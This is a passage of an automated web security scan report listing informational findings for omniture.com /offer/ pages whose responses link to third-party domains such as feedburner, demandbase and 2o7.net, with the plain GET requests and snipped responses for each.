Path:	/offer/100

Issue detail

The page was loaded from a URL containing a query string:

http://www.omniture.com/offer/100?s_osc=24659/

The response contains the following links to other domains:

http://feeds.feedburner.com/omniture/blogs/all
http://leads.demandbase.com/204595ns.gif
http://omniturecom.112.2o7.net/b/ss/omniturecom/5/H.20.3--WAP?

Request

GET /offer/100?s_osc=24659/ HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:10:19 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 06:10:19 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:10:19 GMT
Content-Length: 13429
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:10:19 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Online Marketer's Segmentation
...[SNIP]...
<meta name="verify-v1" content="T5wn84R+6GRfeeLpvX8NHaowkKpDXFwYZmkEBhkD9V4=" />

   <link rel="alternate" type="application/rss+xml" title="Insight. Action. Uplift. The Omniture Blog." href="http://feeds.feedburner.com/omniture/blogs/all" />
   <link rel="shortcut icon" href="http://assets.omniture.com/global/images/general/favicon.ico" />
...[SNIP]...

           <img src="http://omniturecom.112.2O7.net/b/ss/omniturecom/5/H.20.3--WAP?" height="5" width="5" border=0 />
           
...[SNIP]...
<noscript>
           <img alt="Demandbase Connect" width="1" height="1" src="http://leads.demandbase.com/204595ns.gif" />
       </noscript>
...[SNIP]...

17.311. http://www.omniture.com/offer/101 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/101

Issue detail

The page was loaded from a URL containing a query string:

http://www.omniture.com/offer/101?s_osc=24658

The response contains the following links to other domains:

http://feeds.feedburner.com/omniture/blogs/all
http://leads.demandbase.com/204595ns.gif
http://omniturecom.112.2o7.net/b/ss/omniturecom/5/H.20.3--WAP?

Request

GET /offer/101?s_osc=24658 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:16:25 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 06:16:25 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:16:26 GMT
Content-Length: 14068
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:16:25 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>7 Steps to Increasing Website C
...[SNIP]...
<meta name="verify-v1" content="T5wn84R+6GRfeeLpvX8NHaowkKpDXFwYZmkEBhkD9V4=" />

   <link rel="alternate" type="application/rss+xml" title="Insight. Action. Uplift. The Omniture Blog." href="http://feeds.feedburner.com/omniture/blogs/all" />
   <link rel="shortcut icon" href="http://assets.omniture.com/global/images/general/favicon.ico" />
...[SNIP]...

           <img src="http://omniturecom.112.2O7.net/b/ss/omniturecom/5/H.20.3--WAP?" height="5" width="5" border=0 />
           
...[SNIP]...
<noscript>
           <img alt="Demandbase Connect" width="1" height="1" src="http://leads.demandbase.com/204595ns.gif" />
       </noscript>
...[SNIP]...

17.312. http://www.omniture.com/offer/102 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/102

Issue detail

The page was loaded from a URL containing a query string:

http://www.omniture.com/offer/102?s_osc=24663/

The response contains the following links to other domains:

http://feeds.feedburner.com/omniture/blogs/all
http://leads.demandbase.com/204595ns.gif
http://omniturecom.112.2o7.net/b/ss/omniturecom/5/H.20.3--WAP?

Request

GET /offer/102?s_osc=24663/ HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:00:46 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 06:00:46 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:00:46 GMT
Content-Length: 13704
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:00:46 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>7 Advanced Steps to Effective S
...[SNIP]...
<meta name="verify-v1" content="T5wn84R+6GRfeeLpvX8NHaowkKpDXFwYZmkEBhkD9V4=" />

   <link rel="alternate" type="application/rss+xml" title="Insight. Action. Uplift. The Omniture Blog." href="http://feeds.feedburner.com/omniture/blogs/all" />
   <link rel="shortcut icon" href="http://assets.omniture.com/global/images/general/favicon.ico" />
...[SNIP]...

           <img src="http://omniturecom.112.2O7.net/b/ss/omniturecom/5/H.20.3--WAP?" height="5" width="5" border=0 />
           
...[SNIP]...
<noscript>
           <img alt="Demandbase Connect" width="1" height="1" src="http://leads.demandbase.com/204595ns.gif" />
       </noscript>
...[SNIP]...

17.313. http://www.omniture.com/offer/107 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/107

Issue detail

The page was loaded from a URL containing a query string:

http://www.omniture.com/offer/107?s_osc=24653

The response contains the following links to other domains:

http://feeds.feedburner.com/omniture/blogs/all
http://leads.demandbase.com/204595ns.gif
http://omniturecom.112.2o7.net/b/ss/omniturecom/5/H.20.3--WAP?

Request

GET /offer/107?s_osc=24653 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:08:27 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 06:08:27 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:08:27 GMT
Content-Length: 13851
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:08:27 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>BabyCenter: 67% Increase in Con
...[SNIP]...
<meta name="verify-v1" content="T5wn84R+6GRfeeLpvX8NHaowkKpDXFwYZmkEBhkD9V4=" />

   <link rel="alternate" type="application/rss+xml" title="Insight. Action. Uplift. The Omniture Blog." href="http://feeds.feedburner.com/omniture/blogs/all" />
   <link rel="shortcut icon" href="http://assets.omniture.com/global/images/general/favicon.ico" />
...[SNIP]...

           <img src="http://omniturecom.112.2O7.net/b/ss/omniturecom/5/H.20.3--WAP?" height="5" width="5" border=0 />
           
...[SNIP]...
<noscript>
           <img alt="Demandbase Connect" width="1" height="1" src="http://leads.demandbase.com/204595ns.gif" />
       </noscript>
...[SNIP]...

17.314. http://www.omniture.com/offer/108 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/108

Issue detail

The page was loaded from a URL containing a query string:

http://www.omniture.com/offer/108?s_osc=24658

The response contains the following links to other domains:

http://feeds.feedburner.com/omniture/blogs/all
http://leads.demandbase.com/204595ns.gif
http://omniturecom.112.2o7.net/b/ss/omniturecom/5/H.20.3--WAP?

Request

GET /offer/108?s_osc=24658 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:15:30 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 06:15:30 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:15:31 GMT
Content-Length: 14378
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:15:30 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Lastminute.com Achieves a 28% I
...[SNIP]...
<meta name="verify-v1" content="T5wn84R+6GRfeeLpvX8NHaowkKpDXFwYZmkEBhkD9V4=" />

   <link rel="alternate" type="application/rss+xml" title="Insight. Action. Uplift. The Omniture Blog." href="http://feeds.feedburner.com/omniture/blogs/all" />
   <link rel="shortcut icon" href="http://assets.omniture.com/global/images/general/favicon.ico" />
...[SNIP]...

           <img src="http://omniturecom.112.2O7.net/b/ss/omniturecom/5/H.20.3--WAP?" height="5" width="5" border=0 />
           
...[SNIP]...
<noscript>
           <img alt="Demandbase Connect" width="1" height="1" src="http://leads.demandbase.com/204595ns.gif" />
       </noscript>
...[SNIP]...

17.315. http://www.omniture.com/offer/17 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/17

Issue detail

The page was loaded from a URL containing a query string:

http://www.omniture.com/offer/17?s_osc=24653

The response contains the following links to other domains:

http://feeds.feedburner.com/omniture/blogs/all
http://leads.demandbase.com/204595ns.gif
http://omniturecom.112.2o7.net/b/ss/omniturecom/5/H.20.3--WAP?

Request

GET /offer/17?s_osc=24653 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:09:07 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 06:09:07 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:09:08 GMT
Content-Length: 15402
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:09:07 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>3 Proven Approaches to Deliveri
...[SNIP]...
<meta name="verify-v1" content="T5wn84R+6GRfeeLpvX8NHaowkKpDXFwYZmkEBhkD9V4=" />

   <link rel="alternate" type="application/rss+xml" title="Insight. Action. Uplift. The Omniture Blog." href="http://feeds.feedburner.com/omniture/blogs/all" />
   <link rel="shortcut icon" href="http://assets.omniture.com/global/images/general/favicon.ico" />
...[SNIP]...

           <img src="http://omniturecom.112.2O7.net/b/ss/omniturecom/5/H.20.3--WAP?" height="5" width="5" border=0 />
           
...[SNIP]...
<noscript>
           <img alt="Demandbase Connect" width="1" height="1" src="http://leads.demandbase.com/204595ns.gif" />
       </noscript>
...[SNIP]...

17.316. http://www.omniture.com/offer/170 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/170

Issue detail

The page was loaded from a URL containing a query string:

http://www.omniture.com/offer/170?s_osc=24658

The response contains the following links to other domains:

http://feeds.feedburner.com/omniture/blogs/all
http://leads.demandbase.com/204595ns.gif
http://omniturecom.112.2o7.net/b/ss/omniturecom/5/H.20.3--WAP?

Request

GET /offer/170?s_osc=24658 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:14:59 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 06:14:59 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:14:59 GMT
Content-Length: 13945
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:14:59 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Omniture SiteCatalyst 14: Actio
...[SNIP]...
<meta name="verify-v1" content="T5wn84R+6GRfeeLpvX8NHaowkKpDXFwYZmkEBhkD9V4=" />

   <link rel="alternate" type="application/rss+xml" title="Insight. Action. Uplift. The Omniture Blog." href="http://feeds.feedburner.com/omniture/blogs/all" />
   <link rel="shortcut icon" href="http://assets.omniture.com/global/images/general/favicon.ico" />
...[SNIP]...

           <img src="http://omniturecom.112.2O7.net/b/ss/omniturecom/5/H.20.3--WAP?" height="5" width="5" border=0 />
           
...[SNIP]...
<noscript>
           <img alt="Demandbase Connect" width="1" height="1" src="http://leads.demandbase.com/204595ns.gif" />
       </noscript>
...[SNIP]...

17.317. http://www.omniture.com/offer/186 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/186

Issue detail

The page was loaded from a URL containing a query string:

http://www.omniture.com/offer/186?s_osc=24659/

The response contains the following links to other domains:

http://feeds.feedburner.com/omniture/blogs/all
http://leads.demandbase.com/204595ns.gif
http://omniturecom.112.2o7.net/b/ss/omniturecom/5/H.20.3--WAP?

Request

GET /offer/186?s_osc=24659/ HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:09:31 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 06:09:31 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:09:31 GMT
Content-Length: 13697
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:09:31 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Omniture Discover: A New Dimens
...[SNIP]...
<meta name="verify-v1" content="T5wn84R+6GRfeeLpvX8NHaowkKpDXFwYZmkEBhkD9V4=" />

   <link rel="alternate" type="application/rss+xml" title="Insight. Action. Uplift. The Omniture Blog." href="http://feeds.feedburner.com/omniture/blogs/all" />
   <link rel="shortcut icon" href="http://assets.omniture.com/global/images/general/favicon.ico" />
...[SNIP]...

           <img src="http://omniturecom.112.2O7.net/b/ss/omniturecom/5/H.20.3--WAP?" height="5" width="5" border=0 />
           
...[SNIP]...
<noscript>
           <img alt="Demandbase Connect" width="1" height="1" src="http://leads.demandbase.com/204595ns.gif" />
       </noscript>
...[SNIP]...

17.318. http://www.omniture.com/offer/187 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/187

Issue detail

The page was loaded from a URL containing a query string:

http://www.omniture.com/offer/187?s_osc=24663/

The response contains the following links to other domains:

http://feeds.feedburner.com/omniture/blogs/all
http://leads.demandbase.com/204595ns.gif
http://omniturecom.112.2o7.net/b/ss/omniturecom/5/H.20.3--WAP?

Request

GET /offer/187?s_osc=24663/ HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:00:12 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 06:00:12 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:00:12 GMT
Content-Length: 14318
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:00:12 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Omniture SearchCenter: Automate
...[SNIP]...
<meta name="verify-v1" content="T5wn84R+6GRfeeLpvX8NHaowkKpDXFwYZmkEBhkD9V4=" />

   <link rel="alternate" type="application/rss+xml" title="Insight. Action. Uplift. The Omniture Blog." href="http://feeds.feedburner.com/omniture/blogs/all" />
   <link rel="shortcut icon" href="http://assets.omniture.com/global/images/general/favicon.ico" />
...[SNIP]...

           <img src="http://omniturecom.112.2O7.net/b/ss/omniturecom/5/H.20.3--WAP?" height="5" width="5" border=0 />
           
...[SNIP]...
<noscript>
           <img alt="Demandbase Connect" width="1" height="1" src="http://leads.demandbase.com/204595ns.gif" />
       </noscript>
...[SNIP]...

17.319. http://www.omniture.com/offer/191 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/191

Issue detail

The page was loaded from a URL containing a query string:

http://www.omniture.com/offer/191?s_osc=24662/

The response contains the following links to other domains:

http://feeds.feedburner.com/omniture/blogs/all
http://leads.demandbase.com/204595ns.gif
http://omniturecom.112.2o7.net/b/ss/omniturecom/5/H.20.3--WAP?

Request

GET /offer/191?s_osc=24662/ HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:11:16 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 06:11:16 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:11:17 GMT
Content-Length: 13992
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:11:16 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Omniture Genesis: Introducing '
...[SNIP]...
<meta name="verify-v1" content="T5wn84R+6GRfeeLpvX8NHaowkKpDXFwYZmkEBhkD9V4=" />

   <link rel="alternate" type="application/rss+xml" title="Insight. Action. Uplift. The Omniture Blog." href="http://feeds.feedburner.com/omniture/blogs/all" />
   <link rel="shortcut icon" href="http://assets.omniture.com/global/images/general/favicon.ico" />
...[SNIP]...

           <img src="http://omniturecom.112.2O7.net/b/ss/omniturecom/5/H.20.3--WAP?" height="5" width="5" border=0 />
           
...[SNIP]...
<noscript>
           <img alt="Demandbase Connect" width="1" height="1" src="http://leads.demandbase.com/204595ns.gif" />
       </noscript>
...[SNIP]...

17.320. http://www.omniture.com/offer/285 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/285

Issue detail

The page was loaded from a URL containing a query string:

http://www.omniture.com/offer/285?s_osc=24662/

The response contains the following links to other domains:

http://feeds.feedburner.com/omniture/blogs/all
http://leads.demandbase.com/204595ns.gif
http://omniturecom.112.2o7.net/b/ss/omniturecom/5/H.20.3--WAP?

Request

GET /offer/285?s_osc=24662/ HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
